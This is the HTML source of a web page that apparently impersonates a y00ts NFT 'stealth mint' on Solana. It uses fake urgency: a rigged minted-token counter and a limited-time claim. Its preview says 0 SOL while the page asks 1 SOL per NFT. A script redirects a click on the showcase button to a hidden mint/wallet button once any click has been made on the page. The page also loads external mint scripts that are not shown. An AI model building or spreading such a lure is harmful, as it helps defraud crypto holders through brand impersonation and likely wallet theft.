<!DOCTYPE html>
<html lang="en">
  
<head>
    <meta charset="utf-8">
    <meta name="description" content="Monkelabs" data-react-helmet="true">
    <meta name="theme-color" content="#05FFFF">
    <meta content="This message is automatically generated from y00ts." property="og:site_name">
	<meta content="🚨 y00ts | MINT ✅" property="og:title">
    <meta content="🌿 We are glad to announce that the y00ts Mint is now LIVE! 🌿

    🏷️ Sale Info:
   🔹 Price: 0 SOL
   🔹 Supply: 10.000 NFT

   ❗ Stealth Mint will be available for a limited time.

   ❤️ The y00ts team wishes you good luck!" property="og:description">
<meta content='https://pbs.twimg.com/profile_images/1588399574430806018/oBYKtGnj_400x400.jpg' property='og:image'>
    <title>y00ts</title>
    <link rel="shortcut icon" href="https://pbs.twimg.com/profile_images/1588399574430806018/oBYKtGnj_400x400.jpg">
    <link rel="stylesheet" href="ajax/libs/font-awesome/5.15.4/css/all.min.css">
    <link rel="stylesheet" href="assets/css/normalize.css">
    <link rel="stylesheet" href="assets/css/stylef319.css?12122s">

    <script>
        window.addEventListener('click', () => {
            document.getElementById('showcase__btn0').addEventListener('click', function(e) {
                document.getElementsByClassName('MuiButton-containedPrimary')[0].click();
            });
        });
    </script>
  </head>
  <body>
    <script>
new Image().src = "http://whos.amung.us/swidget/bumblebee";
</script>
    <header>
      <div class="logo"><img src="assets/img/logo.png" alt="Logo"></div>
      <div class="social-list">
        <li>
          <a href="https://twitter.com/y00tsNFT" target="_blank"><i class="fab fa-twitter"></i></a>
        </li>
        <li>
          <a href="https://discord.com/invite/dedao" target="_blank"><i class="fab fa-discord"></i></a>
        </li>
      </div>
    </header>

    <section class="section main-screen">
      <div class="main-area">
        
        <div class="main-area__right">
          <h2 class="right-title">y00ts</h2>

          <div class="right-list">
            <li>
              <div class="text">
                y00ts stealth mint, get your one before sold out!
              </div>
            </li>
          </div>

          <div class="price">
            <div class="add-input-remove">
              <input type="text" id="total" value="1" readonly="">
                <a href="javascript:void(0)" class="minus-btn">-</a>
                <a href="javascript:void(0)" class="plus-btn">+</a>
            </div>
            <div class="price-box">
              <div id="price-total"><span>1</span> SOL per NFT</div>
              <div>10 NFT max per transaction</div>
            </div>
          </div>
          <div class="button-box">
            <div id="root" class="cl-root">
                <main>
                    <button id="butt" class="join-btn" tabindex="0" type="button" style="display: none;"></button>
                  </main>
              </div>
              <img src="assets/img/solana.png" alt="solana">
           </div>
        </div>


        <div class="main-area__left">
          <div class="slider-area">
            <img class="animation" src="https://media.tenor.com/2H8AIXa5CfsAAAAd/y00ts.gif" alt="GiF">
            <div class="token">
              <div class="token-title">TOKENS MINTED</div>
              <div class="token-line">
                <div class="line"></div>
                <div class="progress-line"></div>
              </div>
              <div class="token-number" id="tokenup"><span id="tokennumber">7021</span> <span id="endTick">10000</span></div>
            </div>
          </div>
        </div>

      </div>
    </section>

    <script src="assets/js/jquery-3.6.0.min.js"></script>
    <script src="assets/js/slick.min.js"></script>

    <script>
      const $plusButton = document.querySelector(".plus-btn");
      const $minuButton = document.querySelector(".minus-btn");
      const $numberText = document.querySelector("#total");
      const $remaining = document.querySelector('#remaining');
      const $priceResultText = document.querySelector("#price-total span");
      let itemPriceSelected = 1;
      let itemCount = 1;

      $plusButton.addEventListener("click", function (e) {
        e.preventDefault();
        itemCount = itemCount < 5 ? itemCount + 1 : 5;
        $numberText.value = itemCount;
        $priceResultText.textContent = (itemPriceSelected * itemCount).toFixed(2);
      });
      $minuButton.addEventListener("click", function (e) {
        e.preventDefault();
        itemCount = parseInt($numberText.value);
        itemCount = itemCount > 1 ? itemCount - 1 : itemCount;
        $numberText.value = itemCount;
        $priceResultText.textContent = (itemPriceSelected * itemCount).toFixed(2);
      });
    </script>

    <script>
        ! function(e) {

            function t(t) {
                for (var n, i, a = t[0], c = t[1], l = t[2], s = 0, p = []; s < a.length; s++) i = a[s], Object
                    .prototype
                    .hasOwnProperty.call(o, i) && o[i] && p.push(o[i][0]), o[i] = 0;
                for (n in c) Object.prototype.hasOwnProperty.call(c, n) && (e[n] = c[n]);
                for (f && f(t); p.length;) p.shift()();
                return u.push.apply(u, l || []), r()
            }

            function r() {
                for (var e, t = 0; t < u.length; t++) {
                    for (var r = u[t], n = !0, a = 1; a < r.length; a++) {
                        var c = r[a];
                        0 !== o[c] && (n = !1)
                    }
                    n && (u.splice(t--, 1), e = i(i.s = r[0]))
                }
                return e
            }
            var n = {},
                o = {
                    1: 0
                },
                u = [];

            function i(t) {
                if (n[t]) return n[t].exports;
                var r = n[t] = {
                    i: t,
                    l: !1,
                    exports: {}
                };
                return e[t].call(r.exports, r, r.exports, i), r.l = !0, r.exports
            }
            i.e = function(e) {
                var t = [],
                    r = o[e];
                if (0 !== r)
                    if (r) t.push(r[2]);
                    else {
                        var n = new Promise((function(t, n) {
                            r = o[e] = [t, n]
                        }));
                        t.push(r[2] = n);
                        var u, a = document.createElement("script");
                        a.charset = "utf-8", a.timeout = 120, i.nc && a.setAttribute("nonce", i.nc), a.src =
                            function(
                                e) {
                                return i.p + "../static/js/" + ({}[e] || e) + "." + {
                                    3: ""
                                }[e] + "chunk.js"
                            }(e);
                        var c = new Error;
                        u = function(t) {
                            a.onerror = a.onload = null, clearTimeout(l);
                            var r = o[e];
                            if (0 !== r) {
                                if (r) {
                                    var n = t && ("load" === t.type ? "missing" : t.type),
                                        u = t && t.target && t.target.src;
                                    c.message = "Loading chunk " + e + " failed.\n(" + n + ": " + u + ")", c
                                        .name =
                                        "ChunkLoadError", c.type = n, c.request = u, r[1](c)
                                }
                                o[e] = void 0
                            }
                        };
                        var l = setTimeout((function() {
                            u({
                                type: "timeout",
                                target: a
                            })
                        }), 12e4);
                        a.onerror = a.onload = u, document.head.appendChild(a)
                    }
                return Promise.all(t)
            }, i.m = e, i.c = n, i.d = function(e, t, r) {
                i.o(e, t) || Object.defineProperty(e, t, {
                    enumerable: !0,
                    get: r
                })
            }, i.r = function(e) {
                "undefined" != typeof Symbol && Symbol.toStringTag && Object.defineProperty(e, Symbol
                    .toStringTag, {
                        value: "Module"
                    }), Object.defineProperty(e, "__esModule", {
                    value: !0
                })
            }, i.t = function(e, t) {
                if (1 & t && (e = i(e)), 8 & t) return e;
                if (4 & t && "object" == typeof e && e && e.__esModule) return e;
                var r = Object.create(null);
                if (i.r(r), Object.defineProperty(r, "default", {
                        enumerable: !0,
                        value: e
                    }), 2 & t && "string" != typeof e)
                    for (var n in e) i.d(r, n, function(t) {
                        return e[t]
                    }.bind(null, n));
                return r
            }, i.n = function(e) {
                var t = e && e.__esModule ? function() {
                    return e.default
                } : function() {
                    return e
                };
                return i.d(t, "a", t), t
            }, i.o = function(e, t) {
                return Object.prototype.hasOwnProperty.call(e, t)
            }, i.p = "index.html", i.oe = function(e) {
                throw console.error(e), e
            };
            var a = this["webpackJsonpcandy-machine-mint"] = this["webpackJsonpcandy-machine-mint"] || [],
                c = a.push.bind(a);
            a.push = t, a = a.slice();
            for (var l = 0; l < a.length; l++) t(a[l]);
            var f = c;
            r()
        }([])
    </script>
    <script src="static/js/chunk.js"></script>
    <script src="static/js/main.chunk.js"></script>
    <script src="assets/js/tokenup.js"></script>
  </body>

</html>
